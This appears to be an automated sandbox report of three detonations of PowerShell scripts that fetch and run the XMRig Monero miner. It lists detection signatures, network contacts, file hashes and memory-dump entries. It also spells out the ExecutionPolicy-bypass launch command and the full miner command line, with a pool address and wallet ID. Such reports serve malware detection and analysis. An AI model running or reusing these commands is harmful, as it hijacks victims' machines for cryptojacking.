memory/2660-115-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-116-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-117-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-118-0x00007FF606D60000-0x00007FF607993000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:36

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1758s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 77.239.69.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/1368-4-0x00007FFCC1FD0000-0x00007FFCC21AB000-memory.dmp

memory/1368-5-0x00007FFCC1FD0000-0x00007FFCC21AB000-memory.dmp

memory/1368-6-0x00007FFCC1FD0000-0x00007FFCC21AB000-memory.dmp

memory/1368-7-0x00000230474F0000-0x0000023047512000-memory.dmp

memory/1368-10-0x00000230477E0000-0x0000023047856000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ta34h5uo.kre.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1368-25-0x00007FFCC1FD0000-0x00007FFCC21AB000-memory.dmp

memory/1368-61-0x0000023047590000-0x000002304759A000-memory.dmp

memory/1368-48-0x00000230475A0000-0x00000230475B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3092-90-0x0000019624220000-0x0000019624240000-memory.dmp

memory/3092-91-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-92-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/1368-93-0x00007FFCC1FD0000-0x00007FFCC21AB000-memory.dmp

memory/1368-94-0x00007FFCC1FD0000-0x00007FFCC21AB000-memory.dmp

memory/1368-95-0x00007FFCC1FD0000-0x00007FFCC21AB000-memory.dmp

memory/3092-96-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-97-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-98-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-99-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-100-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-101-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-102-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-103-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-104-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-105-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-106-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-107-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-108-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-109-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-110-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-111-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-112-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-113-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-114-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-115-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-116-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-117-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-118-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-119-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-120-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-121-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-122-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-123-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-124-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-125-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-126-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-127-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-128-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-129-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-130-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-131-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-132-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-133-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-134-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-135-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-136-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-137-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-138-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-139-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-140-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-141-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-142-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-143-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-144-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-145-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-146-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-147-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-148-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-149-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-150-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-151-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-152-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-153-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-154-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-155-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-156-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:36

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1778s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 2.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 145.83.221.88.in-addr.arpa udp

Files

memory/3508-2-0x00007FF992773000-0x00007FF992774000-memory.dmp

memory/3508-5-0x000001E4DA2F0000-0x000001E4DA312000-memory.dmp

memory/3508-6-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3508-9-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3508-10-0x000001E4F2970000-0x000001E4F29E6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s4a0ni32.qpb.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3508-25-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3508-26-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3508-27-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3508-28-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3508-51-0x000001E4F27F0000-0x000001E4F2802000-memory.dmp

memory/3508-64-0x000001E4F27D0000-0x000001E4F27DA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1020-93-0x00000202CDC80000-0x00000202CDCA0000-memory.dmp

memory/1020-94-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-95-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-96-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-97-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-98-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-99-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-100-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-101-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-102-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-103-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-104-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-105-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-106-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-107-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-108-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-109-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-110-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-111-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-112-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-113-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-114-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-115-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-116-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-117-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-118-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-119-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-120-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-121-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-122-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-123-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-124-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-125-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-126-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-127-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-128-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-129-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-130-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-131-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-132-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-133-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-134-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-135-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-136-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-137-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-138-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-139-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-140-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-141-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-142-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-143-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-144-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-145-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-146-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-147-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-148-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-149-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-150-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-151-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-152-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-153-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-154-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-155-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

memory/1020-156-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:36

Platform

win10v2004-20240426-en

Max time kernel

1793s

Max time network

1777s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 100.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
NL 23.62.61.73:443 www.bing.com tcp
US 8.8.8.8:53 73.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 129.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 194.98.74.40.in-addr.arpa udp

Files

memory/3520-0-0x00007FFB57093000-0x00007FFB57095000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nt1b0fre.usu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3520-6-0x000001D876940000-0x000001D876962000-memory.dmp

memory/3520-11-0x00007FFB57090000-0x00007FFB57B51000-memory.dmp

memory/3520-12-0x00007FFB57090000-0x00007FFB57B51000-memory.dmp

memory/3520-13-0x00007FFB57090000-0x00007FFB57B51000-memory.dmp

memory/3520-14-0x00007FFB57093000-0x00007FFB57095000-memory.dmp

memory/3520-15-0x00007FFB57090000-0x00007FFB57B51000-memory.dmp

memory/3520-17-0x00007FFB57090000-0x00007FFB57B51000-memory.dmp

memory/3520-18-0x000001D876E30000-0x000001D876E42000-memory.dmp

memory/3520-19-0x000001D876AB0000-0x000001D876ABA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

